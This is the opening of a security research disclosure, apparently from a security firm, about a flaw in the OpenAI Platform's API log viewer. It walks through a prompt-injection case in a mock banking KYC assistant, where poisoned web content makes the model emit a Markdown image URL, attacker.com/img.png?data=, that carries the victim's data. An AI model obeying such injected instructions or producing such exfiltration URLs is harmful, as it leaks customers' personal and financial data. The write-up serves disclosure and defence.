OpenAI API Logs: Unpatched data exfiltration

The OpenAI Platform interface has a vulnerability that exposes all AI applications and agents built with OpenAI ‘responses’ and ‘conversations’ APIs to data exfiltration risks due to insecure Markdown image rendering in the API logs. ‘Responses’ is the default API recommended for building AI features (and it supports Agent Builder) — vendors that list OpenAI as a subprocessor are likely using this API, exposing them to the risk. This attack succeeds even when developers have built protections into their applications and agents to prevent Markdown image rendering.

Attacks in this article were responsibly disclosed to OpenAI (via BugCrowd). The report was closed with the status ‘Not applicable’ after four follow-ups (more details in the Responsible Disclosure section). We have chosen to publicize this research to inform OpenAI customers and users of apps built on OpenAI, so they can take precautions and reduce their risk exposure.

Additional findings at the end of the article impact five more surfaces: Agent Builder, Assistant Builder, and Chat Builder preview environments (for testing AI tools being built), the ChatKit Playground, and the Starter ChatKit app, which developers are provided to build upon.

An application or agent is built using the OpenAI Platform In this attack, we demonstrate a vulnerability in OpenAI's API log viewer. To show how an attack would play out, we created an app with an AI assistant that uses the ‘responses’ API to generate replies to user queries. For this attack chain, we created an AI assistant in a mock Know Your Customer (KYC) tool. KYC tools enable banks to verify customer identities and assess risks, helping prevent financial crimes — this process involves sensitive data (PII and financial data provided by the customer) being processed alongside untrusted data (including data found online) used to validate the customer's attestations.

The user interacts with the AI assistant or agent built using the OpenAI ‘responses’ or ‘conversations’ API Here, 6 data sources are pulled in as part of the KYC review process for this customer. One of these data sources contains content scraped from the internet that has been poisoned with a prompt injection.

When the user selects one of the recommended queries, the AI app blocks the data exfiltration attack In this step, the prompt injection in the untrusted data source manipulates the AI model to output a malicious Markdown image. The image URL is dynamically generated and contains the attacker’s domain with the victim’s data appended to the URL: attacker.com/img.png?data= {AI appends victim’s sensitive data here} However, the malicious response is flagged by an LLM as a judge and blocked, so it is not rendered by the AI app. Note: this attack can occur without an LLM as a judge; more details in Attacking Systems with Alternative Image Defenses.

The flagged conversation is selected for review in the OpenAI platform, which uses Markdown When investigating the flagged conversation, the first step a developer would likely take is opening the OpenAI API logs and reviewing the conversation. The logs for the OpenAI ‘responses’ and ‘conversations’ APIs are displayed using Markdown formatting.

... continue reading